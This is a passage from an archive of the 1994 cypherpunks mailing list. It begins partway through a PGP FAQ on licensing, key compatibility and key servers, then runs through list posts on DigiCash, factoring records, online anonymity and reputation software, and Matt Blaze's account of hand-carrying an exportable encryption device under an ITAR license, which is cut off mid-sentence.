IDEA algorithm. Because the RSA algorithm isn't patented outside of the USA, you are free to use the mpi library instead of RSAREF, if you want to, thus freeing yourself of the RSAREF license restrictions. The RSAREF copyright holds outside of the USA, even though the RSA patent does not. The IDEA conventional block cipher is covered by US Patent 5,214,703 and European patent EP 0 482 154 B1. IDEA is a trademark of Ascom-Tech AG. Commercial users of IDEA (including commercial use of PGP) may obtain licensing details from Ph. Baumann, Ascom Tech Ltd., IDEA Lizenz, Postfach 151, CH-4502 Solothurn, Switzerland, Tel ++41 65 242828, Fax ++41 65 242847. WHAT IS COMMERCIAL USE? Use some common sense. If you are running a business and using PGP to protect credit card numbers sent to you electronically, then you are using PGP commercially. Your customers, however, need not buy the commercial version of PGP just to buy something from you, if that is the only commercial use they make of PGP (since they are spending, not making, money with PGP). If you are just encrypting love letters or other personal mail (for which you don't get paid) on your own personal computer, that is not commercial. If you are encrypting official business mail on your for-profit corporation's computer with PGP, that is commercial use. Note that there are some gray areas not covered above, and the patent owners of RSA and IDEA may differ from my interpretation in the areas not covered above, so if you are in doubt, you should consider the licensing of Viacrypt PGP (or outside of North America, direct licensing of IDEA) to be cheap legal insurance. Indeed, the license fee is probably a lot cheaper than a legal opinion from a lawyer qualified to make such a judgement. Note that I am not a lawyer and the above is not legal advise. Use it at your own risk. WHAT IS THE "TIME BOMB" IN MIT PGP 2.6? There was a version byte change in MIT PGP 2.6 as of 1 September 1994. See ftp://ftp.csn.net/mpj/pgpbomb.asc for details. ARE MY KEYS COMPATIBLE WITH THE OTHER PGP VERSIONS? If your RSA key modulus length is less than or equal to 1024 bits (I don't recommend less, unless you have a really slow computer and little patience), and if your key was generated in the PKCS format, then it will work with any of the current PGP versions (MIT PGP 2.6, PGP 2.6ui, or Viacrypt PGP 2.7). If this is not the case, you really should generate a new key that qualifies. MIT PGP 2.6.2 should be able to use 2048 bit keys. Generation of 2048 bit keys is supposed to automatically be enabled in PGP 2.6.2 in December, 1994. By then, hopefully, most people will have had a chance to upgrade to a version of PGP that can use them, so longer keys won't be a big problem. On the other hand, 1024 bit keys are probably beyond the reach of most criminals and spies to break, anyway. MORE WORLD WIDE WEB URLs http://draco.centerline.com:8080/~franl/pgp/pgp-mac-faq-hinely.html http://draco.centerline.com:8080/~franl/pgp/pgp.html http://draco.centerline.com:8080/~franl/crypto/cryptography.html http://www.pegasus.esprit.ec.org/people/arne/pgp.html http://rschp2.anu.edu.au:8080/crypt.html http://ibd.ar.com/PublicKeys.html http://www.ifi.uio.no/~staalesc/PGPversions.html WINDOWS SHELLS Several shells for running PGP with Microsoft Windows are available at the same places PGP can be found. MACPGP KIT The MacPGP kit is a user interface for the Mac version of PGP. See ftp://ftp.netcom.com/pub/qw/qwerty ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx BUGS See the documentation that comes with PGP in the latest versions for bugs in the older versions. The latest versions of PGP may not fully wipe all traces of plain text from a file when given the -w option. For more information, see http://www.mit.edu:8001/people/warlord/pgp-faq.html BETSI - BELLCORE'S TRUSTED SOFTWARE INTEGRITY SYSTEM For information on this service, send mail to certify at bellcore.com with the subject help, or check http://info.bellcore.com/BETSI/betsi.html INTEGRATING PGP AND PINE Send blank e-mail to slutsky at lipschitz.sfasu.edu with Subject: mkpgp to get a c-shell script to interface PGP and Pine. Send a second message with Subject: addtomkpgplist if you want updates sent you automatically. HOW DO I PUBLISH MY PGP PUBLIC KEY? There are lots of ways. One way is to use a key server. Send mail to one of these addresses with the single word "help" in the subject line to find out how to use a key server. pgp-public-keys at pgp.iastate.edu pgp-public-keys at pgp.mit.edu pgp-public-keys at pgp.ai.mit.edu public-key-server at pgp.ai.mit.edu pgp-public-keys at cs.tamu.edu pgp-public-keys at chao.sw.oz.au pgp-public-keys at jpunix.com pgp-public-keys at dsi.unimi.it pgp-public-keys at kiae.su pgp-public-keys at fbihh.informatik.uni-hamburg.de There is also an experimental public key server at http://ibd.ar.com/PublicKeys.html There is a commercial key certification and publication service, too. Send mail to info at Four11.com for information. You can also mail your key to pgp-public-keys at c2.org, and it will be posted to the subscribers of that mailing list, sent to the keyservers, and posted to alt.security.keydist. To subscribe to the mailing list, send a message to majordomo at c2.org with "subscribe pgp-public-keys" in the body of the message. Another way is to upload it to the PGP public keys area of the Colorado Catacombs BBS (303-772-1062). Another way is to just send it to your correspondents. You could add it to your .plan file so that finger returns your key. You could add it to some of your postings. No matter which way you do it, you should have your key signed by someone who verifies that your key belongs to you, so that you don't have someone else generating a key that has your name on it, but that isn't yours. Here is my public key: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.7 mQCNAi4PT2QAAAEEAPPCZnrshEJ9PSnV+mXEwjM4kzJF0kyg2MnLMzo83vWI40ei jogncqdkXT0c2TQWg+Bsu9ckFoXdId0utumYv0aqd8yI/oU/DwJ1zJrqRL2PFbxe ZLofHoKFjvq1TiNiJq9ps3jW6iYS4IU1SzyKhjmyE+K0+WyrPPX0zg8FAL9FAAUR tCdNaWNoYWVsIFBhdWwgSm9obnNvbiA8bXBqQGNzbi5vcmc+IG1wajiJAJUCBRAu G3chZXmEuMepZt0BAZtAA/0Rw5mintlUDgHycNbeoyIiMHoLu8jWaCSaiGSt+dDU 1A/bUCo+gorv5TYxOClRf3XHjD6zSooWyUz3ehotrzPYLunhVOE2YBxPU+OvKFOc 37mcZrnXGBlF5NblnSYxp0186tGaTm7WMWx7NDlHT4GvhzHJQSOoo48ykDkKm/mk LIkAlQIFEC4PWbs/ZwY8hTPrxQEBKyMD/A7kv91C1ZZIRtkbC9k9lsWOgOnO8wG8 bGMajaco465Z5llWD+Y8QCMdSWcowtOBGfW0Wv1bZ1uebeCpg1L66pJ7C+BOExrk gPqRVCstLLiVerKGeSOZo3yXtxYKYX7mHQPrHp98ef7fUG4IiKS+S+znmGxpJwrV sHZRlhJ3hXUsiQCVAgUQLg9ZefX0zg8FAL9FAQFBTAQAh4u4Vun7WhPuL6fsXiXm paaGfeLtd3biRj/aOMAG1eHuhVdWejx71ormyKTdNB2YV56bpsE3JQ/KhBuYDo0N SkRnqeM2S+Ef7aZEg6Q44uXG52pqCZUldtCeYfOs3aLCR9SMlc6Y3zmpSwB1wKP0 5+tN9zruNYVKKBLWEIFAY7W0K01pY2hhZWwgUGF1bCBKb2huc29uIDxtLnAuam9o bnNvbkBpZWVlLm9yZz60IE1pY2hhZWwgSm9obnNvbiA8bXBqQG5ldGNvbS5jb20+ tChNaWtlIEpvaG5zb24gPDcxMzMxLjIzMzJAY29tcHVzZXJ2ZS5jb20+tCtNaWNo YWVsIFAuIEpvaG5zb24gPG1wam9obnNvQG55eC5jcy5kdS5lZHU+tC1EbyBub3Qg dXNlIGZvciBlbmNyeXB0aW9uIGFmdGVyIDI3IEp1bmUgMTk5Ni4= =rR4q - -----END PGP PUBLIC KEY BLOCK----- Permission is granted to distribute unmodified copies of this FAQ. To get the latest version of this FAQ, get ftp://ftp.netcom.com/pub/mp/mpj/getpgp.asc or send mail to ftp-request at netcom.com with the line SEND mp/mpj/getpgp.asc in the body of the message, or send blank mail to mpjohnso at nyx.cs.du.edu. There are many other frequently asked questions. Most of them are covered in the documentation that comes with PGP or in one of the books about PGP. Send corrections to mpj at netcom.com. I regret that I lost some of the corrections people sent me on the last round of this FAQ, so if I missed yours, please send it again. Thanks. ___________________________________________________________ |\ /| | | | | \/ |o| | Michael Paul Johnson Colorado Catacombs BBS 303-772-1062 | | | | / _ | mpj at csn.org aka mpj at netcom.com m.p.johnson at ieee.org | | |||/ /_\ | ftp://ftp.csn.net/mpj/README.MPJ CIS: 71331,2332 | | |||\ ( | ftp://ftp.netcom.com/pub/mp/mpj/README -. --- ----- .... | | ||| \ \_/ |___________________________________________________________| -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAgUBLwRpyvX0zg8FAL9FAQF57gQAoUHu3+YN+K4KsaJU3bOUgLAPhCzTAQId PRyhY96OjzTRVPmR0bLeZjBCnj4Z2VPirsURA2dIKiQwvCSO9/ODD/HBwty683AD sGWNPhPJ5i7Ik51EGC9xRn2aCbom9KhwXHQNpsB85hI+JRKaorNHlDO7H52FBGA+ Cvb1tro1Zpg= =aM1F -----END PGP SIGNATURE----- From lce at wwa.com Fri Dec 30 12:51:02 1994 From: lce at wwa.com (Larry E) Date: Fri, 30 Dec 94 12:51:02 PST Subject: January meeting with Zimmermann's prosecutor In-Reply-To: Message-ID: In article , Philip Zimmermann wrote: > The following is a message from my lawyer, Phil Dubois. He posted it > to alt.security.pgp, and I thought I should post it here as well. The > message is signed with his key. > > --Philip Zimmermann > The aforementioned signed message from PKZ's lawyer message failed signature check on my system, apparently because it contained a very long text line which, somewhere along the way, was chopped into two lines before it arrived in my mailbox. The two lines as they appeared in my message (which failed signature test) are: From kafka at desert.xs4all.nl Fri Dec 30 13:45:09 1994 From: kafka at desert.xs4all.nl (Patrick '3l33t' Oonk) Date: Fri, 30 Dec 94 13:45:09 PST Subject: No privacy with DigiCash In-Reply-To: Message-ID: <199412302145.AA09925@xs1.xs4all.nl> -----BEGIN PGP SIGNED MESSAGE----- ddt at lsd.com (Dave Del Torto) once said: DD> At 6:39 am 12/24/94, Jonathan Cooper wrote: DD> >> one of the big selling points of DigiCash. Is there something I am DD> >> overlooking, some way to buy things privately with DigiCash? DD> > DD> > I don't think so. It appears that the initial implementation of DD> >DigiCash works exactly that way [based on what I've read on their W3 DD> >server]. Of course, I could tell you more exactly had they replied to DD> >any of my four separate attempts to try it out .. DD> DD> Interesting. I too have made four requests and still not received any DD> software. Can you say "vapor?" I have received it and I've seen the future. It's cool. Patrick !*$||#%&@#|!*&*&|$!#!@# NO CARRIER _______________________________________________________________________________ kafka at desert.xs4all.nl Cryptoanarchy, MDMA, Tekkkkno, SL-1200 Kafka's home page _______________________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLv1sj5RymF15lPcFAQH4QgH8CUpPRJb8TbobmYC4hOng+NExoyW1fPDL Ax6BqJeO2tX9QAbKkXPPLgLE9kL8Y1AZLaFPa0KKQVp3S7EAVfEwfg== =shGQ -----END PGP SIGNATURE----- From witter at utdallas.edu Fri Dec 30 18:10:17 1994 From: witter at utdallas.edu (witter at utdallas.edu) Date: Fri, 30 Dec 94 18:10:17 PST Subject: My "netcard" In-Reply-To: Message-ID: On Fri, 30 Dec 1994 witter at utdallas.edu spilled: > > > > > On Fri, 30 Dec 1994, Anonymous User wrote: > > > Michael D. Crawford wrote: > > > > > One might ask, "if they can finger, why give the key?" The recipient > > > might not be on the Internet. I don't think you can finger from AOL, > > > and I'm sure you can't from UUCP, AppleLink or CompuServe. > > > > Yes you can! You just have to know how to use finger-by-email. :) > > > > Just incase you were wondering... > > TO:infobot at infomania.com > Sub: FINGER name at internic.net ^^^^^^^^^^^^^^^^^ should be name at site From mpd at netcom.com Fri Dec 30 18:34:10 1994 From: mpd at netcom.com (Mike Duvos) Date: Fri, 30 Dec 94 18:34:10 PST Subject: New GNFS Factoring Record Message-ID: <199412310234.SAA21711@netcom10.netcom.com> Arjen Lenstra posted an article in sci.crypt earlier today reporting on the factorization of a 119 digit number using the General Number Field Sieve. This is a new record factorization for the algorithm, surpassing the 116 digit number factored in July of this year. I would encourage anyone interested in factoring to read the article, which I will not waste bandwidth by quoting here. A few of the more interesting points follow. Lenstra estimates that GNFS would have factored RSA-129 in approximately one-quarter of the time employed by the QS algorithm used for that task a while back. 100,001 primes were used for the rational factor base. 360,001 were used for the algebraic factor base. Sieving took aproximately 250 MIPS years. Selection of the polynomial took three days on a DEC 3000. The factorization was found on the third dependency. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From camp at industrial.com Fri Dec 30 21:26:49 1994 From: camp at industrial.com (camp at industrial.com) Date: Fri, 30 Dec 94 21:26:49 PST Subject: another factoring thing. . . . Message-ID: Hey did anyone see the artical, some time ago in Science News (May 14, 1994) their was this artical on using a 'quantum computer'. Through the marvels of quantum mechanics it is theroretically possible to build a computer that would be really good at factoring large numbers such as the ones used in RSA. This combined with team sieving could possibly be used to signifigantly reduce the time required to factor a key. Any thougts, did anyone else see the artical, has there already been a really stimulating discusion that I missed? Well let me know. gemnis From nelson at crynwr.com Fri Dec 30 22:50:33 1994 From: nelson at crynwr.com (Russell Nelson) Date: Fri, 30 Dec 94 22:50:33 PST Subject: Cyphernomicon via the WWW Message-ID: Tim May's Cyphernomicon is available (on an experimental basis) from . This is based on an old version of his document. I'll update it within a day or so (ftp.netcom.com is too busy). The document is used unchanged -- a gateway program converts it on the fly. His outline form is preserved. I think you'll like the way it's presented. I know it still has problems. I just got this working. It's nearly 2 AM. If I'm to have any hope of making it to midnight tomorrow, I'd better get some sleep tonight! -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From nelson at crynwr.com Fri Dec 30 22:54:11 1994 From: nelson at crynwr.com (Russell Nelson) Date: Fri, 30 Dec 94 22:54:11 PST Subject: Cyphernomicon via the WWW Message-ID: Whoops! Silly me, I should know better than to announce things at 2AM. I forgot the www in apocalypse (bet you didn't know there *was* a www in apocalypse -- it's silent like the pee in swimming). Anyway, the correct URL is: http://www.apocalypse.org/pub/u/nelson/bin.cgi/cyphernomicon -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From blancw at pylon.com Sat Dec 31 01:21:07 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Sat, 31 Dec 94 01:21:07 PST Subject: Technical Knowledge Reflecting Moral Ignorance Message-ID: <199412310922.BAA18704@deepthought.pylon.com> Responding to msg by James A. Donald: ;If we fail to point out that people have a right to :privacy, if we fail to point out the moral and :constitutional implications of coercive inspection, :then our enemies win, by citing tax evaders child :pornographers terrorists and pedophiles. Well, sure, you can always expect that government employees should have to know about morality, since they've made themselves responsible for things like social welfare and the advancement of Great Societies. But no one else is required to 'behave' that way - they only need to know that they will suffer the consequences of trespassing the lines which divide us. :If all morality is relative, then the only possible way :for people to live together peaceably is for a single :arbitrary will and to impose that morality by as much :violence as necessary -- this is the classic argument :(Hobbes, Nazis) for absolutist government. No one said that morality is or should be relative, nor either that they want to live together peaceably. They did express their displeasure at having to read anyone's disapproval on particular applications of crypto knowledge. I myself don't think that being able to evaluate human actions in terms of their propriety is outside the capacities of technogeeks to ponder (don't jump if you don't identify with one). I agree it is important, especially for those who do expect to live in formal societies, to develop a *conscious knowledge* of morality, of the meaning of human actions in terms of 'right' and 'wrong'. If we were all properly acquainted with the elements of morality it would be easier to identify its place in the life of real humans who have values and wish to protect them from deliterious, intrusive attacks (from any source). A conscious knowledge also makes it possible to present valid basis for objecting to the 'evil' which governments will do. You said, in reference to ye kings of olde, that "many of the actions of the state were unlawful" and that there were those who established that the king could not "make law as he pleased". Actually, being a conquering ruler gives a king the latitude to make any 'law' that he pleases. But to free themselves from the king's grasp, the influential philosophers of the past took their mind to a consideration of what the substance of morality, or 'goodness/badness', means in the life of a human being qua the nature of being human. What else could be the basis for the desire to act in freedom & liberty from autocratic rule? Some cpunks don't think it's necessary to indulge in these discussions, but individuals always act within the context of evaluations upon the implications of their actions. It doesn't go away; it must be dealt with it, especially if what one (publicly) contemplates doing is potentially in conflict with others' high moral standards. .. Blanc From carolann at icicle.winternet.com Sat Dec 31 06:13:38 1994 From: carolann at icicle.winternet.com (Carol Anne Braddock) Date: Sat, 31 Dec 94 06:13:38 PST Subject: From Me to You for the Coming Year....*giggle* Message-ID: '##::::'##::::'###::::'########::'########::'##:::'##: ##:::: ##:::'## ##::: ##.... ##: ##.... ##:. ##:'##:: ##:::: ##::'##:. ##:: ##:::: ##: ##:::: ##::. ####::: #########:'##:::. ##: ########:: ########::::. ##:::: ##.... ##: #########: ##.....::: ##.....:::::: ##:::: ##:::: ##: ##.... ##: ##:::::::: ##::::::::::: ##:::: ##:::: ##: ##:::: ##: ##:::::::: ##::::::::::: ##:::: ..:::::..::..:::::..::..:::::::::..::::::::::::..::::: '##::: ##:'########:'##:::::'##: ###:: ##: ##.....:: ##:'##: ##: ####: ##: ##::::::: ##: ##: ##: ## ## ##: ######::: ##: ##: ##: ##. ####: ##...:::: ##: ##: ##: ##:. ###: ##::::::: ##: ##: ##: ##::. ##: ########:. ###. ###:: ..::::..::........:::...::...::: '##:::'##:'########::::'###::::'########::'####:'####: . ##:'##:: ##.....::::'## ##::: ##.... ##: ####: ####: :. ####::: ##::::::::'##:. ##:: ##:::: ##: ####: ####: ::. ##:::: ######:::'##:::. ##: ########::: ##::: ##:: ::: ##:::: ##...:::: #########: ##.. ##::::..::::..::: ::: ##:::: ##::::::: ##.... ##: ##::. ##::'####:'####: ::: ##:::: ########: ##:::: ##: ##:::. ##: ####: ####: :::..:::::........::..:::::..::..:::::..::....::....:: .-. .--. .-. : : : .; :: : : : .--. .-..-. .--. : :: : .-..-..-. .--. .-..-. .--. : :__ ' .; :: `; :' '_.' : :: :: :_ : `; `; :' .; ; : :; :`._-.' _ :___.'`.__.'`.__.'`.__.' :_;:_;`.__;`.__.__.'`.__,_;`._. ;`.__.': ; .-. : ;' `._.' .--. .-. .--. : .--' : : : .; : : : .--. .--. .--. : : : :,-.,-.,-.,-. .--. : :__ ' .; ; : ..'' .; :: :_ : :: :: ,. :: ,. :' '_.' `.__.'`.__,_;:_; `.__.'`.__; :_;:_;:_;:_;:_;:_;`.__.' RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REGISTERED PGP KEY NO.0C91594D carolann at icicle.winternet.com finger carolann at winternet.com |more *********************************************************************** My WWW Homepage Page is at: http://www.winternet.com/~carolann From jya at pipeline.com Sat Dec 31 07:03:08 1994 From: jya at pipeline.com (John Young) Date: Sat, 31 Dec 94 07:03:08 PST Subject: NYT on Anon Amok Message-ID: <199412311503.KAA08590@pipe1.pipeline.com> Peter Lewis writes long article today on net anonymity, good, bad and heavenly, with emphasis on remailers, and probable legislative control. And a funny piece on Bill's buy of St. Peter's Boys Club. For email duo-copy send blank message with subject: ANON_gee From perry at imsi.com Sat Dec 31 09:39:19 1994 From: perry at imsi.com (Perry E. Metzger) Date: Sat, 31 Dec 94 09:39:19 PST Subject: remarkably bad media Message-ID: <9412311739.AA09311@webster.imsi.com> A remarkably bad article by Peter H. Lewis in today's Times -- front page, actually -- on anonymity on the net. He manages to confuse the "Microsoft aquires Church" spoof with problems from anonymity -- in fact, he opens his article by apparently chalking up the whole episode to anonymity rather than complete stupidity on the part of anyone believing an obvious spoof. (The original "AP" article was not anonymous -- someone just posted a satirical message to the net. The connection with anonymity is so tenuous as to be nonexistant.) Things get rapidly worse. Just to list some of the problems, he calls digital cash a way for people to open swiss bank accounts, confuses the case of that kid at MIT who was running pirate boards with a case of anonymity, spreads lots of FUD, gets lots of quotes from some alarmist professor no one has ever heard of, makes a hash of explaining why anonymous remailers are useful (and doesn't understand that forgery and anonymity are sort of inherent in the fabric of the net), makes a hash of explaining digital signatures, etc. Truly one of the worst articles I've ever seen in the New York Times on any topic of any sort -- and given the Times, thats an amazing level to have fallen to. The man seems devoid of even a basic understanding of journalism -- as one example, journalists are supposed to interview the people they are discussing to get comment (this is nearly the first rule), but he never bothered to interview a single remailer operator, it seems, even though he mentions Julf by name. Maybe sending some email to Julf would have been too much effort, or maybe it would have made the story less sensationalistic if he'd bothered to be balanced. He didn't seem to check any of his facts, either (another rule), and the whole thing reads like an editorial instead of an objective piece of reporting. I really wonder if Lewis actually lives and works on the internet, or if he's truly the amateur he seems to be. He comes of as not understanding the basic mechanics of how things operate day to day that even a non-technical person would understand. I would complain somehow to the Times, but I suspect that it would be impossible to convey properly even the rules of simple journalism that he broke, even ignoring all the technological misunderstandigs. Sadly, the editors would have no reason to listen to me, a random guy they'd never heard of. Another step in the slow disintegration of a once proud "paper of record", I'm afraid. Perry From rishab at dxm.ernet.in Sat Dec 31 10:16:01 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sat, 31 Dec 94 10:16:01 PST Subject: Calling beta testers for reputation software Message-ID: Vladimir Z Nuri says he's having trouble posting to the list, so here's the note on phase three of the beta-test for his experimental reputation/mail filtering software. Some people believe vznuri (the visionary) is Larry Detweiler; I don't really care - he's too coherent, and his software looks interesting. Non netcom-ers will have trouble ftp'ing to netcom, though. Rishab ===========cut here========== To: cypherpunks at toad.com Cc: rishab at dxm.ernet.in (Rishab Aiyer Ghosh) Subject: Pazzap reputation software Date: Fri, 30 Dec 94 21:38:57 -0800 From: "Vladimir Z. Nuri" Hello. At one time I posted a message asking for volunteers to help me debug some reputation/mail filtering software. My "phase two" tests are progressing and the software is serving multiple subscribers with a degree of reliability. I would now like to open up my tests to the wider cypherpunk audience for "phase three". I would be delighted if anyone would be interested in participating. At this point I particularly need people who want to play with the command features and are not just subscribing to what they see as a free and no-involvement-required mail filtering service. In preparation for any new users I have just html'd the complete documentation for easy reference on my web site. The software is still in a prototype stage and the redistribution of messages is not at the utmost reliable level. In particular at this stage I may still have to periodically put the list on "hold" periodically to debug the software. However at this point I believe the reliability is rapidly nearing a high level. For more information use Mosaic or Lynx to the URL ftp://ftp.netcom.com/pub/vznuri/home.html (I have relaxed earlier more formal nondisclosure terms but I do ask that you submit to an informal "nonpublicity" agreement.) This will serve as the master bulletin board for future developments in the software. pay special attention to the "status" item which I will update very regularly (and in most cases use in lieu of a mailing list) Thanks-- p.s. this was posted through a remailer due to mailing problems at my end. ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^ \ / ~/ |\| | | |> | Vladimir Z. Nuri : : : : : `Imagination is more important \/ /_ | | \_/ |\ | vznuri at netcom.com : : : : : : than knowlege' (Einstein) ===========cut here========== ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rah at shipwright.com Sat Dec 31 11:48:42 1994 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 31 Dec 94 11:48:42 PST Subject: ANON_gee Message-ID: ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From mab at research.att.com Sat Dec 31 13:30:14 1994 From: mab at research.att.com (Matt Blaze) Date: Sat, 31 Dec 94 13:30:14 PST Subject: Exporting cryptographic materials, theory vs. practice Message-ID: <9412312132.AA11647@merckx.info.att.com> DRAFT - PLEASE DO NOT QUOTE OR REDISTRIBUTE Mostly to find out what the process was like, I recently applied for, and received, a temporary export license for a so-called ``exportable'' telephone voice encryption device to take with me on a business trip to England and Belgium. I returned from the trip last week, device in hand. Here's how it went. The device in question is an AT&T ``Telephone Security Device (TSD)'', model 3600-F. This is the ``bump in a cord'' voice encryptor. The ``F'' model is supposed to be approved for ``fast track'' export; it doesn't use Clipper or DES, but rather some ``exportable'' algorithm. This model is aimed primarily, I presume, at international business travelers who want to communicate in a reasonably secure manner with their home offices in the states. In other words, a typical user carries it with him or her when traveling abroad. The particular options that I got for the device included a James Bond-ish looking acoustic coupler and handset for dealing with the hardwired phones that are common in European hotel rooms. About two months before my trip I called our (AT&T's) export lawyer division. It turns out that while there was some discussion in the government about exempting from the export licensing process temporary exports of cryptographic equipment used on business trips, this exemption never actually took effect. So even though the device I had was already approved for sale abroad, I still needed to get a temporary export license. But they assured me that ``this is an easy, routine process''. Well, sure enough, about two weeks before I was to leave I got back my official US State Department ``license for the temporary export of unclassified defense articles''. So far, so good. According to the information printed on the license and additional information from the lawyer, I have to leave from an international airport with a customs agent present (no problem there). At the airport, I have to fill out a form called a ``shipper's export declaration'' (SED) on which I have to declare that ``these commodities are authorized by the US government for export only to Belgium and the United Kingdom [the countries I'm visiting]. They may not be resold, transshipped, or otherwise disposed of in any country, either in their original form or incorporated into other end-items without the prior written approval of the US Department of State''. Then I'm to present the SED and export license to a customs official at the airport before I leave. The Customs officer is supposed to take my SED and endorse my license to show what I'm actually taking out of the country. On the way back in, I'm supposed to ``declare'' my item (even though it was manufactured in the US) and show them my license, and they're supposed to endorse the license again to show that I have, in fact, returned the ``defense article''. The first hitch I ran into was that no one could actually tell me where I could get an SED form. But when I called customs they assured me that this was no big deal. ``Just come by customs at the airport, and we stamp the form. I guess you can just fill out the SED there'' they said, assuring me this is not a big deal. I made sure to get to the airport early anyway. Although there was moderately heavy traffic near the airport, I made it to JFK two and a half hours before my 10pm flight. I was flying United, which has their own terminal at JFK, so Customs has an office right there in the same building from which I was to depart (JFK is awful to get around, so I was glad for this). I checked in for my flight (and got upgraded to first class, which bolstered my expectation that everything was going to be really easy from here on). Then, luggage, license and TSD in hand, I made my way downstairs to Customs, expecting to fill out the SED form and ``just have my license stamped'' as they had assured me earlier on the telephone. I explained my situation to the security guard whose job is to keep people from going in to the Customs area, and he led me to ``the back office'' without much argument or delay. The head uniformed customs guy in the back office (which I think is same office where they take the people suspected of being ``drug mules'' with cocaine-filled condoms in their stomaches) looked approachable enough. He had a sort of kindly, grandfatherly manner, and he was playing ``Doom'' on a laptop computer. I got the impression that most of the people he encounters are suspected drug smugglers, and he seemed pleased enough to be dealing with something a little different from the norm. When I explained what I was doing he looked at me as if I had just announced that I was a citizen of Mars who hadn't even bothered to obtain a Visa before leaving. He explained, carefully, that a) I really do need the SED form; b) Not only that, I should have already filled it out, in duplicate; c) He doesn't have blank SED forms; d) he, like everyone else in the entire US government that I had spoken to, has no idea where one gets them from, but people must get them from somewhere; and e) it doesn't really matter, because I'm in the wrong place anyway. I asked him where the right place is. ``The cargo building, of course,'' he explained patiently. I remembered the cargo building because we passed it in the taxi just as the traffic jam began, about half an hour before I got to the United terminal. The airport shuttle bus doesn't stop there. I'd have to call a taxi. ``But I think they're closed now, and even if they were open you'd never make it before your flight'' he helpfully added, saving me the trip. He also complemented for going to the trouble to get the license. I must have looked hurt and confused. Eventually he called in some fellow in a suit who must have been his boss. ``Are you the guy who wants to export the fancy gun?'' the fellow in the suit asked me. ``It's not a gun, it's a telephone,'' I responded, with a straight face. ``Why do you have a license to export a telephone?'' Good question, I thought. I explained about the ITAR, and showed him the thing. He agreed that it looked pretty harmless. The guy in the suit reiterated points a through e almost verbatim (do they rehearse for these things?) and explained about how this is a State Department license, not a Customs license, and this doesn't happen very much because exports usually go via The Cargo Building. He'd love to help me, but the computer in which these things get entered is over in Cargo. ``That's how the records get made. But you do have a valid license, which is nice.'' He also suggested that I would have an easier time had I shipped the device instead of carrying it with me. I asked what I should do, given that my plane was scheduled to leave in less than an hour. Neither was sure, but the fellow in the suit seemed willing leave it to the discretion of the uniformed guy. ``How does this thing work, anyway?'' he asked. I tried to explain as best as I could, trying to make it sound as harmless as it is. ``You mean like that Clipper chip?'' he asked. At this point, given that he has a laptop and knows something about the Clipper chip, I figured that maybe there was some hope of making my flight. Or maybe I was about to spend the night in jail. In my mind, I put it at about a 90:10 hope:jail ratio. Then he asked, ``Do you know about this stuff?'' So we chatted about computers and cryptography for a while. Finally, the two of them decided that it wouldn't really hurt for them to just sign the form as long as I promise to call my lawyer and get the SED situation straightened out ASAP. They assured me that I won't be arrested or have any other trouble upon my return. I made my flight, validated license in hand. An aside: Throughout my trip, I discovered an interesting thing about the TSD and the various options I was carrying with it. Under X-ray examination, it looks just like some kind of bomb. (I suspect it was the coiled handset cords). Every time I went through a security checkpoint, I had to dig the thing out of my luggage and show it to the guard. I almost missed the new ``Eurostar'' chunnel train (3hrs 15mins nonstop London->Brussels, airport-style checkin and security) as the guards were trying to figure out whether thing thing was about to explode. On the way back to the US, it took me a little over an hour to get through Customs. I carried all my luggage with me, and, expecting a bit of a hassle, made sure to be the FIRST person to reach Customs. The inspector was ready to wordlessly accept my declaration form and send me on my way when I opened my mouth and explained that I needed to get my export license stamped. The inspector explained that this had to be done by something called the ``Ships Office''. I was sent to an unoccupied back room (a different back room than before), and told to wait. I thought about the recent Customs experiences of Phil Zimmermann. After about half an hour of waiting, an officer came in and asked me what I needed. I explained that I needed to get my export license endorsed, and she shrugged and told me that she had to ``process the flight'' first. As best as I could tell, her job was to clear the airplane itself through customs, that being, technically speaking, a very expensive import. It would take a little wile. She was pleasant enough, though, and at least didn't look at me as if she intended to send me to jail or have me strip searched. Finally, she finished with the plane and asked me for my form. She studied it carefully, obviously having never seen one before, and eventually asked me what, exactly, she was supposed to do. I explained that I had never actually gone through this process before but I understood that she's supposed to record the fact that I was re-importing the device and stamp my form somewhere. She explained that she didn't know of any place for her to record this. After some discussion, we agreed that the best thing to do was to make a Xerox copy of my license and arrange for it to go wherever it had to go later. She stamped the back of the license and sent me out. It was a little over an hour after I first reached the Customs desk. My conclusion from all this is that it just isn't possible for an individual traveler to follow the rules. Even having gone through the process now, I still have no idea how to obtain, let alone file, the proper forms, even for a device that's already been determined to be exportable. The export of ITAR-controlled items is ordinarily handled by cargo shipment, not by hand carrying by travelers, and the system is simply not geared to deal with exceptions. Technically speaking, everyone with a laptop disk encryption program who travels internationally is in violation of the ITAR, but 